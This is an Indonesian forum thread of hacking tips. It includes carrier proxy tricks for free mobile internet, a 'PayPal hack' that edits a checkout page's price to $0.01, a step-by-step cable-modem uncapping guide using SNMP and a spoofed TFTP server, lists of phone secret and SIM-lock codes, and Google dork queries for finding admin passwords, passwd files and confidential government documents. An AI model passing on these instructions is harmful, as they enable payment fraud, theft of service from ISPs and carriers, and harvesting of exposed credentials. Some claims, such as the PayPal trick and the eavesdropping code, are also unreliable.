9. Isi Proxy Setting dengan IP 203.26.206.132. Isi port dengan port 554
Proxy type HTTP/HTTPS Proxy.10. Pada bagian Account Information, isikan user dan password nya dengan yang kamu dapat pada saat daftar di Your-Freedom.
11. Cek pada tab Message seharusnya akan muncul tulisan
Client Version : 20070511-01 Server Version : 20070510-11 Auth-ok : Authentication Accepted Starting Port Current RTT : xxxx ms…Selanjutnya Setting browser kamu…., untuk yang pake’ Mozilla, nih settinganya…
1. Klick Tools, Options, Advanced, Network, Setting…
2. Pilih Manual Proxy Configurations
3. Kosongkan semua bagian kecuali pada bagian HTTP, SSL dan FTP diisi localhost 8080, sementara
SOCK Host isikan localhost port 1080.
Kemudian pada bagian No Proxy for isikan localhost, 127.0.0.1,92.168.0.0/16Gratisan Three
Mungkin udah ada yang tau, jadi ini buat yang blom tau aja ya... Tos dulu
setting inet three free
username 3mms
password 3mms
apn 3mmsterserah mau dapat ip client berapa 10.21.xx.xx atau berapa kek, ngga masalah. Cool
setelah terkoneksi masuk dalam jaringan, silahkan buka ultrasurf isi dengan manual proxy 10.4.0.10 port 8080, tunggu sampai ada status sukses.
untuk setting browser firefox ubah proxy menjadi 127.0.0.1 port 9666 ok.
kalau udah selamat browsing cuma masih sering dc, silahkan dioprek lebih lanjut. Tos dulu.XL Gprs
Ni da gret dr XL, coba gw share, mungkin teman2 ada yang belum tau, ntar kurang lebihnya teman2 lengkapin ya...
Setting dengan:
IP: 217.27.32.188
Port: 9201
Tambahkan URL dengan wap.xl.co.id@ sebagai contoh:
http://wap.xl.co.id@wap.test.com
Untuk bisa menggunakan secara full tambahkan juga dengan:
http://wap.xl.co.id@mobile.aolsearch.com/lnk000/
Apabila anda menggunakan PC,
coba gunakan browser winwap dan bisa juga pakai browser openwave.
Trik ini hanya bisa dipakai jika xl anda dalam masa aktif.
Setelah gprs xl aktif pastikan pulsa anda telah habis atau dibawah Rp.2000,-.
Nah untuk memasuki kesebuah halaman wap
ubahlah http:// menjadi Http://udah sampai disini .
mgkn cm kena 1000 perak klo bwt dng trik itu semua .
Semoga Bermanfaat …Posted 4 months ago # -
Hacking PayPal Untuk Beli Barang di Internet Hanya Dengan $ 0,01
seperti yang dikatakan blog ini http://jakabanda.blogspot.comIni sebenarnya trik lama yang dulu pernah saya coba dan dapet buku 10 biji, cuma saya nggak bisa sebutin situsnya (sorry bro… ntar kalo ketahuan bisa mampus dipenjara…).
Kalo pengen coba ikutin langkah sederhana yang pernah saya coba:
Yang harus Anda punya:
Browser Mozilla Firefox
Account PayPalIni langkahnya:
1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …Selamat Mencoba …
Posted 4 months ago # -
cara mendapatkan account premium RapidShare dan Megaupload Premium gratis
Jika kamu ingin mendapatkan account RapidShare dan Megaupload Premium gratis, ada cara yang GRATIS, LEGAL dan HALAL untuk mendapatkannya. Sebenarnya tidak gratis juga, kita bener-benar membeli account RapidShare Premium lewat websitenya. Namun uang yang kita gunakan untuk membeli account premium RapidShare bukan dari kantong kita, melainkan dari HASIL USAHA kita.Intinya adalah kita akan dibayar setelah melakukan serangkaian surveys. Uang yang dibayarkan kepada kita bisa di transfer ke account kita di PayPal. Setelah itu kita membeli account Premium RapidShare lewat account PayPal kita. Semuanya gratis dari internet.
Langkah - langkah mendapatkan Premium account RapidShare:
1. Klik banner dibawah ini dan daftar account >> mudah sekalisetelah kamu klik langsung aja create free account, isi form-form yg ada dan yg paling penting adalah anda harus punya email yang valid .
2.setelah itu, Daftar account PayPal di http://www.paypal.com (GRATIS). Klik "Sign Up Today!", pilih negara dan kamu bisa klik "Personal Account" atau "Premier Account". Satu perbedaan antara kedua account tersebut adalah "Premier Account" bisa menerima pembayaran melalui credit card, sedangkan "personal Account" tidak. Jadi seandainya AWSurvey ingin membayar uang hasil survey kamu dengan Credit Card, maka kamu langsung bisa menerima tanpa harus konfirmasi lagi. Setelah memilih ikuti saja perintah berikutnya. Tidak perlu memasukkan no kartu kredit jika ditanyai, karena kita menggunakan account PayPal untuk menerima uang dari A.W.SURVEY.
3. Setelah mendapatkan uang cukup, transferkan ke account PayPal kamu.
4. Beli Premium Rapidshare account dari website RapidShare dengan account PayPal kamu.
Sebenarnya tidak hanya account RapidShare saja, tapi kita bisa membeli apa saja lewat internet selama mereka menerima pembayaran dengan PayPal.
Posted 4 months ago # -
Hack Modem Anda dan Meningkatkan Kecepatan download dari 64Kbps Sampai sesuai Harapan Anda .
Sebagian besar dari kita akan merasa bahwa kecepatan berselancar yang dialokasikan oleh ISP kami tidak cukup. 64Kbps dengan orang-orang akan berpikir 128Kbps akan sejuk kecepatan. 128Kbps dengan orang-orang akan berpikir 256Kbps akan dingin dan seterusnyaTutorial ini akan mengajarkan anda cara meningkatkan 64Kbps link ke 512Kbps atau what ever kecepatan yang Anda inginkan.
Hal ini sangat mungkin untuk melakukan hal ini. Dengan sedikit keberuntungan jika anda Cable Internet Service Provider sangat biadab tentang bagaimana teknologi baru ini sangat berhasil dan meninggalkan beberapa loopholes buka kunci bagi Anda untuk ambil informasi penting tentang cara untuk menyelesaikan tugas ini. Tapi tutorial ini tidak akan menjamin 100% keberhasilan Anda.
Baiklah kita mulai. Saya akan mencoba untuk menjelaskan Anda sebagai terbaik yang saya dapat melakukannya untuk kembali mengkonfigurasi Anda SB5100, SB4100 atau SB3100 modem kabel
Teori kabel modem bekerja
Semua kabel modem ketika boot up akan mencari seorang "Image file" di mana anda semua konfigurasi seperti batas kecepatan upload dan download adalah batas kecepatan ditetapkan. Ini "Image file" disimpan di ISP
s TFTP server. Modem akan dikonfigurasi dengan pra-ISPs TFTP alamat IP server dan nama file gambar untuk di-download. Apabila modem boot itu atas permintaan TFTP server dan men-download file gambar dari server TFTP ini sesuai dengan batas kecepatan ini kami akan menetapkan.Misi Kami
Gambar ini mendapat file dari ISP
s TFTP server, reconfigure itu menurut kami perlu dan memaksa kami modem untuk men-download file ini dari komputer daripada mendownloadnya dari ISPs TFTP server.Langkah-langkah untuk menyelesaikan
1). USB modem mendapatkan alamat MAC
2). ISP Anda mendapatkan alamat IP server TFTP
3). Dapatkan nama dan path dari "file konfigurasi" atau file foto yang disimpan di ISP `s TFTP server.
4). Download Image file dari ISP `s TFTP server.
5). Decrypt dengan file foto yang anda download dari ISP `s TFTP server
6). Memodifikasi file foto
7). Mengenkripsi file foto yang dimodifikasi
8 ). Mengubah komputer Anda sama dengan konfigurasi TCP ISPs TFTP Server (yaitu alamat IP sama dengan ISPs TFTP server)
9). TFTP host server di komputer Anda
10). Letakkan file gambar dalam direktori dasar yang Anda TFTP
11). Restart modem
12). Changer PC IP kembali sebagai yang diberikan oleh ISP
13). Selesai OOPS. Mulai berselancar dengan kecepatan baru1). USB modem mendapatkan alamat MAC
Anda bisa melihat bagian belakang modem untuk mendapatkan Alamat MAC ini atau Anda dapat logon ke Cable modem dengan Web Browser hxxp: / / 192.168.100.1 /. Internal ini adalah halaman HTML Anda disimpan DOCsis kabel modem (SB5100, SB4100 dan SB3100) yang memberikan anda lebih banyak informasi mengenai konfigurasi penting. Kecuali dimatikan oleh ISP Anda. Fitur ini mungkin totally dimatikan oleh ISP Anda.
2). ISP Anda mendapatkan alamat IP server TFTP
3). Dapatkan nama dan path dari "file konfigurasi" atau file foto yang disimpan di ISP `s TFTP server.Untuk mendapatkan informasi ini penting Anda harus melakukan SNMP mudah modem Anda. Untuk melakukan hal ini anda dapat menggunakan salah satu dari alat-alat di bawah ini
a) Terdapat sebuah program bernama Aneh QUERY.EXE dari Solusi yang merupakan permintaan BOOTP paket program yang akan Anda kirim segalanya yang perlu Anda ketahui, tanpa semua ini langkah-langkah ekstra. Akan menampilkan file gambar, alamat server TFTP, semua yang benar-benar Anda butuhkan untuk memulai. Untuk menggunakan alat ini BOOTP QUERY, anda memerlukan alamat MAC dari modem kabel
Atau
Para ahli dapat menggunakan program Solarwinds SNMP
Atau
c) Beginners DOCSIS Diagnosis dapat menggunakan utilitas
Atau
d) Beginners dapat menggunakan Alat SNMPWALK
menggunakan perintah "snmpwalk 192.168.100.1 publik"
CATATAN: Penggunaan alamat IP modem sebagai "192.168.100.1" (SB5100, SB4100 dan SB3100) ketika diminta untuk memberikan oleh salah satu dari alat-alat di atas. SNMP masyarakat "Umum"
Menggunakan alat-alat di atas Anda akan mendapatkan informasi dari ISP `s IP server TFTP dan nama" Image file "yang disimpan di server TFTP
Semua informasi penting yang disimpan dalam file ini, Salah satu yang menjadi MaxRateDown 2621440; MaxRateUp 393216;. (Ini adalah pengaturan ISP saya. Anda dapat melihat yang mirip dengan apa yang saya mendapatkan kecepatan. 40KB / s ke atas dan 250 KB / s down)Di antara ini, yang kami butuhkan adalah:
Konfigurasi server TFTP = 194 .*.*.. 90 (mengganti ini dengan yang anda inginkan di seluruh doc)
= Nama file konfigurasi isrr.bin (ganti dengan yang anda inginkan selama ini di doc)
Dan
Fragmen IP dibuat = 0
IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx
IP address.192.168.100.1 = 192.168.100.1 (alamat IP kabel modem, (mengganti ini dengan yang anda inginkan di seluruh doc)
IP-ke-Jika-index.10.xxx.xxx.xxx = 2Saran: Anda dapat melakukan langkah ini oleh sniffing modem yaitu "192.168.100.1" modem ketika boot up. Saya tidak pernah mencoba metode ini. Coba luck.
4). Download Image file dari ISP `s TFTP server.
Untuk melakukan hal ini bisa anda gunakan command prompt dan perintah di bawah ini dengan tanda kutip keluar dan bracket.
"C: \ TFTP-i GET"
Okay sekarang anda mendapat file gambar dari ISP `s TFTP server.
5). Decrypt dengan file foto yang anda download dari ISP `s TFTP server
6). Memodifikasi file foto
7). Mengenkripsi file foto yang dimodifikasiDocsis menggunakan alat yang dapat Anda download dari
CODEhttp: / / sourceforge.net / projects / docsismenggunakan program ini Anda dapat decrypt file gambar mengubah kecepatan upload dan kecepatan download, menyimpan dan mengenkripsi kembali. Ubah nama file ini baru dibuat sama dengan file gambar asli Anda.
8 ). Mengubah komputer Anda sama dengan konfigurasi TCP ISP
s TFTP Server (yaitu alamat IP sama dengan ISPs TFTP server)Pergi ke tempat saya jaringan dan klik kanan -> properties
Pilih LAN Card klik kanan -> properti-> Internet Protocol (TCP-IP) double klik dan mengubahnya ke nilai-nilai sebagai berikut
Mengkonfigurasi TPC dari TCP pengaturan sebagai berikut
IP: 194 .*.*. 90 (ganti dengan TFTP server dari ISP)
Netmask: 255.255.255.0
Gateway: 192.168.100.1 (ganti dengan modem kabel alamat IP)Catatan: Gateway harus 192.168.100.1 maka hanya modem Anda dapat berkomunikasi dengan komputer.
9). TFTP host server di komputer Anda
10). Letakkan file gambar dalam direktori dasar yang Anda TFTP
11). Restart modemDownload software dan TFTP Server TFTP host server di komputer Anda
Anda dapat men-download dari server TFTP:
CODEftp: / / http://ftp.ida.net/pub/wireless/tftpd32.exeMulai TFTPD32 server. Menuju ke Pengaturan dan Pengamanan untuk mengatur Kosong. Meningkatkan timeout untuk 20secs dan Max Retransmit ke 6. Memilih untuk menterjemahkan file UNIX. Make sure it's base direktori untuk tempat isrr.bin adalah (misalnya file gambar yang akan diubah). Jika Anda perlu replikasi direktori pathname beserta file gambar, kemudian membuat sebuah direktori akar dari yang berkaitan dengan file gambar pathname.
Restart modem Anda, dan AS SOON sebagai SEND cahaya berjalan solid, Anda akan melihat menerima pada server TFTP yakni PC
12). Changer PC IP kembali sebagai yang diberikan oleh ISP
13). Selesai OOPS. Mulai berselancar dengan kecepatan baruSekarang Anda mengubah pengaturan TCP PC kembali normal seperti yang diberikan oleh ISP. (I.e. Tempatkan alamat IP Anda yang asli dan gateway)
Oops Anda hacked modem Anda. Uji oleh men-download beberapa file menggunakan memancing (download accelerator plus)
Catatan: kecepatan ini akan tetap sama sampai Anda me-restart modem kabel. Jadi setiap kali Anda reboot modem, anda harus mengikuti langkah-langkah 8,9,10,11 dan 12
Posted 4 months ago # -
kode - kode rahasia ponsel .
Kode Rahasia Umum Symbian
*#06# Melihat IMEI
*#0000# Melihat Versi sofware
*#9999# Melihat Versi sofware
*#7370# Soft Reset
Untuk Hard reset: Tekan Tombol hijau, 3 dan * ditekan bersamaan, tekan tombol power. Password standar 12345
*#92702689# Melihat info tanggal perbaikan
Kode Rahasia Umum Java
*#7380# Reset atau Restore Factory Setting Nokia seri 40
*#7370# Reset atau Restore Factory Setting Nokia seri 60
*3370# Untuk restart ponsel Nokia 3310
*#7220# Mengaktifkan GPRS PCCCH
*#3925538# Menghapus Wallet di ponsel Nokia 6610,63101, data Wallet terhapus semua
*#67705646# Menghapus operator logo di ponsel Nokia 3310 & 3330
Operator GSM
Selain kode rahasia yang ada di ponsel, operator GSM juga memiliki kode rahasia untuk layanan yang diberikan pada pelanggan.
Call Diverting/ Call Forward/ Pengalihan Semua
* * 21* NUMBER # [SEND] Mengaktifkan
# # 21 # [SEND] Membatalkan
* # 21 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila tak ada jawaban
* * 61 * NUMBER # [SEND] Mengaktifkan
# # 61 # [SEND] Membatalkan
* # 61 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila dilu-ar jangkauan
* * 62 * NUMBER # [SEND] Mengaktifkan
# # 62 # [SEND] Membatalkan
* # 62 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila sibuk
* * 67 * NUMBER # [SEND] Mengaktifkan
# # 67 # [SEND] Membatalkan
* # 67 # [SEND] Melihat status
# # 002 # [SEND] Membatalkan semua pengali-han
Diverting Data/ Forward Data/ Pengalihan semua data
* * 21 * NUMBER * 25 # [SEND] Mengaktifkan
# # 21 # * 25 [SEND] Membatalkan
* # 21 # * 25 # [SEND] Melihat status
NOKIA
Nokia 9300/ 9500
*#170602112302# Melihat versi software
*3370# Memakai tenaga baterai cadangan
#3370# Menon-aktifkan Enhanced Full Rate Codec ( EFR).
*#4720# Mengaktifkan Half Rate Codec.
#pw+1234567890+l# Melihat status Provider Lock, (tekan * untuk simbol p,w +)
#pw+l 234567890+2# Melihat status Network Lock, (tekan * untuk simbol p,w +)
#pw+1234567890+3# Melihat status Country Lock, (tekan * untuk simbol p,w +)
#pw+1234567890+4# Melihat status SIM ‘Card Lock, (tekan * untuk simbol p,w +)
*#21# Melihat semua panggilan yang dialihkan.
*#2640# Menampilkan Security Code.
#30# Melihat Private Number.
*#73# Reset the Phone Timers.
*#746025625# Menampilkan status SIM Clock.
*#7760# Manufactures code.
*#7780# Restore factory settings
*#92702689* Melihat garansi posnel
(*#WAROANTY#)
Tekan & tahan tombol “Shift + Ctrl + F dan tombol Power Soft Reset
Nokia E60
*#92702689# *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis.
*4720# (*hraO#) Mengaktifkan Half Rate
#4720# (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370* (#efrO#) Menon-aktifkan Enhanced Full Rate
* #746085685* (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#peaO#) Mengaktifkan GPRS dan dukungan Packet Common Control Channel (PCCCH)
*#7230# (*#pcdO#) Menon-aktifkan GPRS dan dukungan Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538# (*#resOwallet#) Reset the Mobile Wallet, data akan hilang semua
Nokia E61
Tahan # Berganti profile dan mode diam.
Tombol fungsi biru + Ctrl Mengaktifkan Bluetooth
Tombol fungsi biru + Chr Mengaktifkan IR
Ctrl + C Copy
Ctrl + X Cut
Ctrl + V Paste
Ctrl + Joystick Down Page Down (turun satu halaman)
Ctrl + Joystick Up Page Up (naik satu halaman)
Shift + Joystick Left or Right Menyorot satu lurus
Shift + Ctrl + Joystick Left or Right Menyorot satu kata
Ctrl + Joystick Left or Right Menggerakkan cursor diantara kata
*#2820# Melihat alamat Bluetooth
*#62209526# Melihat alamat adapter WLAN MAC
*#92702689# Melihat usia ponsel
Nokia E65
*#92702689# *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720# (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370# (#efrO#) Menon-aktifkan Enhanced Full Rate
*#746085685# (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#pcaO#) Mengaktifkan Half Rate
*#7230# (*#pcdO#) Menon-aktifkan Half Rate
*#7760# (*#ssnO#) Mengaktifkan Enhanced Full Rate
*#2820# (*#btaO#) Menon-aktifkan Enhanced Full Rate
*#7370925538# (*#resOwallet#) Melihat status SIM lock
Nokia E70
*#btaO# Melihat alamat Bluetooth
*#macOwlan# Melihat alamat adapter WLAN MAC
*#oprOlogo# Menghilangkan logo operator
*#pcaO# Mengaktifkan logo operator
*#pcdO# Menon-aktifkan GPRS dan dukungan Packet common control channel (PCCCH)
*#simOclock# Melihat status SIM clock
*#170602112302# Melihat versi software
*#warOanty# Melihat kode garansi
#pw+1234567890+n#
n = 1
n = 2
n = 3
n = 4 Menampilkan status SIM lock
provider lock
network lock
country lock
SIM lock
Nokia N80
*#92702689* *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720* (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370* (#efrO#) Menon-aktifkan Enhanced Full Rate
*#746085685* (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#pcaO#) Mengaktifkan dukungan GPRS dan Packet Common Control Channel (PCCCH)
*#7230#. (*#pcdO#) Menon-aktifkan dukun¬gan GPRS and Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538*. (*#resOwallet#) Reset the Mobile Wallet
Nokia N91
*#06# Melihat IMEI.Tanggal pembelian, tanggal servis
*#0000# Menampilkan versi firmware dan tanggal
*#btaO# Melihat alamat Bluetooth MAC
*#oprOlogo# Menghilangkan logo operator
*#pcaO# Mengaktifkan dukungan GPRS PCCCH
*#pcdO# Menon-aktifkan dukungan GPRS PCCCH
*#resOwallet# Reset the mobile wallet
*#simOclock# Menampilkan status SIM clock
*#ssnO# Menampilkan nomor seri pabrikasi
*#warOanty# Menampilkan garansi dan servis
*efrO# Mengaktifkan encoding EFR
#efrO# Menon-aktifkan encoding EFR
*hraO# Mengaktifkan encoding HR
#hraO# Menon-aktifkan encoding HR
#pw+1234567890+n#
n = 1
n = 2
n = 3
n = 4 Menampilkan status SIM lock
provider lock
network lock
country lock
SIM lock
Nokia N93
*#92702689* *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720#* (#hraO#) Menon-aktifkan Half Rate
*#3370# (*efrO#) Mengaktifkan Enhanced Full Rate
*#746085685* (*#simOclock#) Melihat status SIM lock
*#7220# (*#pcaO#) Mengaktifkan dukungan GPRS dan Packet Common Control Channel (PCCCH)
*#7230# (*#pcdO#) Menon-aktifkan dukung¬an GPRS and Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538# (*#resOwallet#) Reset Mobile Wallet
Nokia N96
*#92702689# Melihat umur ponsel
*#62209526# Alamat Wireless MAC (M A C _ WLAN)
*#2820# Alamat Bluetooth MAC (B T A 0?)
*#7370# Format Soft Reset
*#7780# Factory Reset/ Hard Reset
SAMSUNG
Untuk membuka kode ponsel Samsung, dapat dilakukan dengan cara posisi SIM Card tidak terpasang pada ponsel. Namun kode dibawah ini tidak akan berfungsi pada beberapa versi ponsel Samsung secara keseluruhan.
*#06# Melihat IMEI
*2767*5282# Java reset
*2767*63342# Reset media
*2767*927# Wap reset
*#9998*4357# Help menu
**9998*5282# Setting Java server
*#9999#0# Melihat monitor mode
*#9999# Sofware version
*#8888# Hardware version
*#9998*748# SIM info
*#9998*523* Contrast layar ponsel
*#9998*842* Vibration ON lalu tekan OK
*#9998*289# atau *0289# atau *#0289# Buzzer ON lalu tekan OK
*#9998*782* Menunjukkan tanggal & alarm
*#8999*638# Menunjukkan info network
*#9998*5646* Mengubah logo operator
*#9998*968* Menunjukkan nada untuk alarm
*#3243948# Digital audio interference OFF
*#32436837# Digital audio interperence
*#0001# Menunjukkan serial parameter
*#9998*228# Melihat kapasitas batera
*2767*2878# Custom EEEPROM reset
*2767*3855# Full EEPROM reset
*#9998*585# Non-Volatile Memory (NVM)
*#9998*76# Nomor produksi
*#9998*782# Menunjukkan tanggal dan jam alarm
*#9998*778# or *#9998*0778# or
*#0778# Daftar layanan SIM
*#9998*377# or *#9998*0377# Error log
*#9998*746# or *#9998*0746# or
*#0746# Sim Info
Samsung V200 & V300
*2767*63342# Unlock Code
*2767*3855# Unlock Code
*2767*2878# Unlock Code
*2767*927# Unlock Code
*2767*7822573738# Unlock Code
LG
2945#*# Test mode LG
2945*#01*# Menu rahasia
*#06# IMEI
*#07# IMEI and SW
*8375# Software version (LG B1200):
*6861# Recount cheksum (LG B1200)
*PWR 668 Factory test (B1200):
1945#*5101# Simlock menu (LG B1200)
2945#*5101# Simlock menu (LG 510W, 5200)
2945#*70001# Simlock menu (LG 7020, 7010)
2947#* Simlock menu (LG 500, 600)
BENQ SIEMENS
*#06# Versi software BenQ Siemens, lebih lengkapnya, tekan softkey beberapa kali
*#0001# Menu bahasa Inggris
*#0606# Kode rahasia, lepaskan SIM card lebih dulu
*#0003*(secret code)* Unlock Sim
*#0049# Menu bahasa Jerman
*12022243121 Layar tambahan
BENQ
C30 *#06# Cek IMEI
*#166*# Cek Versi Software C36 *#06# Cek IMEI
*#166*# Cek Versi Software T60 *#06# Cek IMEI
*#66*# Cek Versi Software E72 *#06# Cek IMEI
Mengganti bahasa ke default atau English *#0000# —> dial.
Mengganti bahasa dari English ke Indonesia: *#0062# —> dial.
* melihat kode negara
MOTOROLA
Pada ponsel Motorola terdapat symbol yang cukup aneh untuk fungsi Pause. Symbol [] (Pause) maksudnya tekan tombol * dan tahan hingga muncul tanda []. Masih banyak kode-kode lain yang ada. Jika angka terakhir dengan angka 0 maka kita dapat menon-aktifkan kode tersebut. Nomor tiga digit di bagian tengah dimulai dari angka 0 hingga 999. Kita bisa mengganti frekuensi menjadi 900/1800 den¬gan memasukkan tipe tertentu. Berikut ini langkah-langkahnya.
*#06# Melihat IMEI
Tekan bersamaan * 7 Kode untuk membuka tombol
[] [] [] 0 0 8 [] 1 [] Memilih line telepon - (gunakan untuk menulis sesuatu di bawah nama provider
[] [] [] 1 0 5 [] 1 [] Menambahkan phonebook di menu utama
[] [] [] 1 0 7 [] 1 [] Menambahkan pesan di menu utama
[] [] [] 1 0 8 [] 1 [] Copy memory SIM (menu phonebook)
[] [] [] 1 1 3 [] 1 [] Pilihan teknis (menu utama)
[] [] [] 1 0 1 [] 1 [] Slow (Frequency menu pen-cari)
[] [] [] 1 0 2 [] 1 [] Medium (Frequency menu pencari)
[] [] [] 1 0 3 [] 1 [] Fast (Frequency menu pen¬cari)
[] [] [] 1 1 9 [] 1 [] Mengaktifkan EFR
[] [] [] 0 0 4 [] 1 [] Mengganti Pin
[] [] [] 0 0 5 [] 1 [] Membuka blok menggu-nakan nomor PUK
Ponsel China
Seperti halnya ponsel branding, ponsel China juga memiliki kode rahasia untuk mengakses menu-menu rahasia. Ponsel China ini memiliki fitur seperti layar sentuh, dual kamera, dual sirh, dual baterai, dual charger dan fitur-fitur lainnya. Sebagian besar ponsel China memiliki software dan fitur yang sama, namun tampilannya saja yang terlihat berbeda.
1122, 3344, 1234, 5678 Kode default user
*#110*01# Mode teknis
*#987# Mode pabrik Factory mode
*#110*01# -> Device -> Set UART -> PS Config -> UART1/115200 Mengaktifkan port COM
*#987*99# Restore factory settings
*#369# Mengatur LCD contrast
*#800# software version
*#900# software version
*#0000# Send Mengatur bahasa standard
*#0044# Send Mengatur bahasa Inggris
*#001# Send Mengatur bahasa Inggris (firmware baru)
*#0086#, *#0886# Mengganti ke bahasa China
*#0084#, *#0966# Mengganti ke bahasa Vietnam
Sony Erricsson K800i
*#3449*~11*1# –> Menyantol frekuensi GSM Terdekat, Sehingga Kita bisa Mengguping Pembicaraan GSM aktif terdekat dengan lokasi anda…Posted 4 months ago # -
GOOGLE HACK
versi ini dijelaskan dalam bhs inggris ,
silahkan anda artikan sendiri .
heheheh .Google is a pretty powerful search tool. You knew that. You can use it to find information, but you can also use it to find downloadable MP3s, books, videos, and other items. We're going to assume you're just looking for legally available downloads, but the truth of the matter is if someone's posted an MP3 (copyrighted or not) to their web page, Google can find it.
But who has the time to memorize all the search modifiers like "-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma|.ogg) ?" That's where Google Hacks comes in. This handy little app will let you search for dozens of file types, song lyrics, cached pages, fonts, and other little goodies hanging out on the web.
Just download and install Google Hacks for Mac, Linux, or Windows, fire it up and enter your search term and check the boxes next to the type of search you want to perform. Your results will show up in your default web browser .
untuk menggunakannya dpt didownload lewat ini :
http://rapidshare.com/files/101727238/google-hacks1.6.rarPosted 4 months ago # -
MENCARI PASSWORD LEWAT GOOGLE
Nah! tiba waktunya kita memanfaatkan "Paman Google" ini untuk search (nyari apa saja di internet) dengan waktu dan teknik yang bisa disebut "tepat". Lagi-lagi ini juga hasil dari berbagai hunting saya di berbagai web dan blog teman2 semua. Oleh karena itu ga salah juga saya pun turut andil ingin bagi-bagi informasi.Pertama, Anda bisa mencari dari :
1. Iklan Google yang ada di semua situs, hasilnya akan sama saja.
2. Tombol Google search yang ada di toolbar.
3. Google main search Engine : http://www.google.comSelanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut :
Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.
"Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yangdimaksud. Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.
“inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.
Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
>“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.
“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.
Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org
“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian :
“filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.
“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya. Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.
ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
